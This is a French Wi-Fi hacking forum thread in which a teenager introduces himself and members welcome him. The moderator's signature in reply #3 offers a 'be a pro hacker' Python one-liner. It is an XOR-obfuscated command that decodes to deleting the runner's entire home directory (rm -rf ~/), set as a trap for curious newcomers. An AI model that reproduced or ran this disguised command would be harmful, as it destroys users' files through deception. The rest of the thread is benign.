Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 31-10-2014 22:51:33

Beafantles
N00b

Longue présentation d'un petit rêveur

Bonjour à tous !

J'ai pensé qu'il serait sympathique de me présenter un petit peu avant de piller ce site de tout ce dont j'ai besoin et de tout ce que j'ai envie de découvrir et d'apprendre ! big_smile
Je suis donc un petit lycéen de 16 ans, en première SSI (Scientifique – Sciences de l’Ingénieur), féru de jeux vidéo et d'informatique plus généralement. Cette histoire d’amour entre l’ordinateur et moi a débuté le jour où mon père m’a autorisé à utiliser son ancien ordinateur, il y a maintenant plus de dix ans. smile Mon père ne souhaitait cependant pas que j’ai des CD de jeux et c’est donc avec les jeux intégrés avec Windows que ma passion des jeux vidéo est née, plus particulièrement avec le démineur. Mais, lorsque l’on est petit, tant que le jeu nous plaît et que l’on gagne, pourquoi s’intéresser à son fonctionnement, à savoir comment Ensemble Studios à développer Age Of Mythology, ce jeu qui a marqué tout mon enfance durant l’école primaire ? tongue Cette envie de comprendre comment fonctionne tout ce qui est automatique et plus particulièrement l’informatique est venue assez tard et est apparue lors d’un cours de technologie en troisième. Ce cours-là, nous étions sur les ordinateurs et j’avais fini le travail demandé avant les autres élèves. N’ayant plus rien à rien et m’ennuyant un peu, je passais le temps en jouant au démineur. Cependant, le démineur, c’est drôle cinq minutes mais lorsqu’il faut attendre vingt minutes pour la récré, cela devient vite lassant. J’ai donc fouillé un peu dans le menu démarrer jusqu’à atteindre la fameuse cmd. Vint alors une terrible soif de curiosité lorsque cette petite fenêtre noire apparaît, avec l’underscore qui attend avec espoir que l’on rentre une commande. Le soir-même, je me suis renseigné et c’est là qu’a commencé cette soif de connaissance de l’informatique. Une de mes plus grandes passions était de créer. J’ai donc commencé à m’intéresser à l’automatisation de l’information à travers de petits programmes en batch et de circuits électriques sur le célèbre jeu Minecraft. Arrivé au lycée, j’ai commencé à me demander si cette passion pour l’informatique pourrait se traduire plus tard à travers un métier. Je me suis vite lancé dans le dur apprentissage de la programmation informatique, avec le site du zéro qui m’a permis de comprendre ses bases, et ceci via le C++ (je ne peux cependant pas dire que je sache programmer, je pense juste que je suis capable de comprendre un code relativement basique et de le modifier à ma guise). Cependant, lorsque l’on commence à comprendre comment cela fonctionne, on devient fatalement intéressé par tous ces gens qui savent exploiter chaque petite erreur que l’on a pu laisser passer dans un code, qui font crasher des systèmes de défense, qui à eux seuls font trembler des millions de codeurs et de grandes entreprises !  Dire qu’au même âge que moi, le jeune Jonathan James, simplement armé d’un ordinateur avec Pentium 266 ait réussi il y a déjà quelques années à infiltrer la NASA et récupérer des documents dont la valeur est estimée à 1,7 million de dollars ! Moi qui me croyait hackeur lorsque j’atteignais le niveau 6 à Intrusion, jeu appartenant à Muxxu ! big_smile Bref, je compte fouiller de fond en comble ce forum pour satisfaire ma curiosité et pouvoir peut-être à terme hacker ma propre Freebox (héhé, bien que ce soir d’une utilité limitée, la fierté sera de mise ! big_smile) ! Cependant, il me reste beaucoup de choses à comprendre et surtout à apprendre, ce qui me laisse bien loin de mes rêves du nouveau Bill Gates ! smile

Beafantles

You have been DerpTrolled

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 01-11-2014 00:38:50

Furyo
Membre Irremplaçable
Site Web

Re : Longue présentation d'un petit rêveur

Bienvenue Beafantles wink

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#3 02-11-2014 15:10:37

spawn
Modérateur

Bienvenue big_smile

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#4 02-11-2014 17:48:04

coyotus
Membre Irremplaçable
Lieu : fort fort lointain

J'ai pas lu c'est trop long mais bienvenue

1310812721.gif

#5 03-11-2014 00:50:57

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Bonjour Petit-Poucet rêveur big_smile
J'ai lu ta présentation et je l'ai trouvé très sympa ( boooooo à la grosse feignasse de  coyotus wink ) et c'est bien agréable de voir ton enthousiasme et ta soif de connaissances.

Cependant, il me reste beaucoup de choses à comprendre et surtout à apprendre, ce qui me laisse bien loin de mes rêves du nouveau Bill Gates ! smile

Vise plus haut : être le nouveau Linus Torvalds cool
Bienvenue parmi nous et à bientôt sur le forum smile

#6 04-11-2014 00:30:11

M1ck3y
Administrateur
Lieu : Lost in the darkness

Une présentation qui ne laisse planer aucun doute: bienvenue chez nous ami geek smile

Annonce